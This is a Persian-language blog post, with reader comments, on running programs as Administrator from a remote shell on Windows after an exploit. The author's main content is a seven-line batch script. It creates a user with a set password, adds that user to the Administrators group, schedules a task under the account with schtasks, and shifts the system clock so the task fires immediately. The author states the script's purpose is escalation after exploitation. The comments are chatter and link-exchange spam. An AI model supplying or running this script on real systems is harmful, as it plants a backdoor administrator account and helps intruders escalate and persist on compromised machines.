سلام یه چند وقتیه که دیگه جلالم حوصله نوشتن نداره نمیدونم چرا درشو گل نمی گیریم!
چند وقت پیش یکی از دوستانم از من پرسید که چطور می تونه سطح دسترسی خودش رو تحت ویندوز افزایش بده و ایا چیزی شبیه su در ویندوز وجود داره یا نه. پاسخ من هم این بود که نه دقیقا. در واقع یه زمانی بود ولی حذف شد ولی شما می تونی با دستور RUNAS با دادن User و Password هر برنامه ای رو تحت امتیاز کابر خاصی مثلا Admin اجرا کنی.
دوست مورد بحث خوشحال رفت و ناراحت برگشت! گفت که این Runas منتظر Password نمیشه. بلافاصله یادم افتاد که توی Shell هایی که بوسیله Exploit های مختلف بوجود میان امکان استفاده از Runas وجود نداره چون برای پنهان کردن کاراکتر ها وارد یه حالت خاص میشه که این Shell ها قاط میزنن مساله وقتی هیجان برانگیز شد که سر نوشتن یه Batch فایل شرط بستیم با این شرایط که فقط از فایل های موجود در ویندوز استفاده بشه (نه یه برنامه جداگانه که قبلا انتقال داده شده) و 100% خودکار یه Exe خاص رو بتونه تحت امتیاز Admin اجرا کنه.
در راه اکتشافات برای جلوگیری از واژه غلط کردم و پس از کلی کلنجار مشخص شد هیچ راهی برای اجرای Runas در Shell های remote یا Telnet وجود نداره (ظاهرا این مشکل عمدا توسط مایکروسافت بوجود اومده). در واقع هر برنامه ای که نیاز به Password داره و از فانکشنی خاص (که اسمش الان یادم نیست)استفاده می کنه همین مشکل رو داره. پس جواب نهایی این بود که به دستوری نیازه که اینقدر احمق باشه که Password رو جزء پارامترهاش بگیره.
اما به طور مختصر جریان از این قراره که Schtasks دستور کنسولیه که برای زمان بندی کارها طراحی شده به این صورت که شما تعیین می کنید چه برنامه این در چه روز و ساعتی خودکار اجرا بشه که به درد Scan کردن خودکار ویروسها و یه همچین کارایی می خوره یه رابط گرفیکی هم داره که در Start>Control Panel > Scheduled Tasks قرار داره.
در ادامه Script نهایی رو اینجا میارم که امیدوارم به درد بخوره (در واقع فقط به درد افزایش دسترسی بعد از Exploit کردن می خوره) لازه به ذکره که این فقط به درد Scalation از System به Admin می خوره !
1)NET USER DommyUserName /ADD
2)NET USER DommyUserName dommypass
3)NET LOCALGROUP Administrators DommyUserName /Add
4)schtasks /create /tn dommytaskname /sc daily /st 23:55:00 /ru
DommyUserName /rp dommypass /tr "Calc.exe"
5)time 11:55:00
6)ping 127.0.0.1 >> null
7)time 23:55:00
توضیح:
خط اول یه کابر به عنوان DommyUserName میسازه – خط دوم پسورد این user رو dommypass قرار میده – در خط سه این کابر به گروه Administator ها اضافه می شه تا دسترسی Admin داشته باشه – در خط بعد یک task برای ساعت 23:55 هر روز تخت کابر فوق بوجود میاد – خط 5 ساعت فعلی سیستم رو به یه ساعت خاص تغییر میده – از خط 6 برای بوجود آوردن 3 ثانیه وقفه استفاده شده – خط هفت ساعت سیستم رو برابر 23:55 دقیقه قرار می ده و Boom!
گاهی لازمه خطوط 5 و 6 و7 چند بار تکرار بشن!
دیدگاهها
13 پاسخ به “privilege-scalation and Windows”
جالب بود جلال جان
:) اونجا نوشته که مهران خان نوشته ها :)) به من چه
نوع و Syntax دستورات مورد استفاده در ویندوز خیلی بچه گانه و غیر قابل گسترش به نظر میاد :))
با سلام . از شوش بلاگ دیدن کنید . ما آماده تبادل لینک با وبلاگ شما هستیم . در صورت تمایل از وبلاگ ما دیدن کرده و در قسمت نظرات پیام بگذارید . با آرزوی موفقیت و سربلندی روز افزون – متشکریم
لینک وبلاگ شما در شوش بلاگ قرار داده شد . در صورت امکان لینک وبلاگ ما را در لینکستان خود قرار دهید . با تشکر .
از پیشنهاد شما متشکریم. موفق باشید.
حاج آقا، التماس دعا…ما رو فراموش نکنید…خوشا بسعادتون..! ;)
آقا اینجا تکوپدیاست. حوزه علمیه کوچه پایینیه :-)
برادر از توجه شما سپاس گزاریم.
درود بر شما دیروز غروب بر سر مزار ابر مردی جمع بویم که همیشه بامداد خواهد بود خوشحال می شوم که به من سر بزنید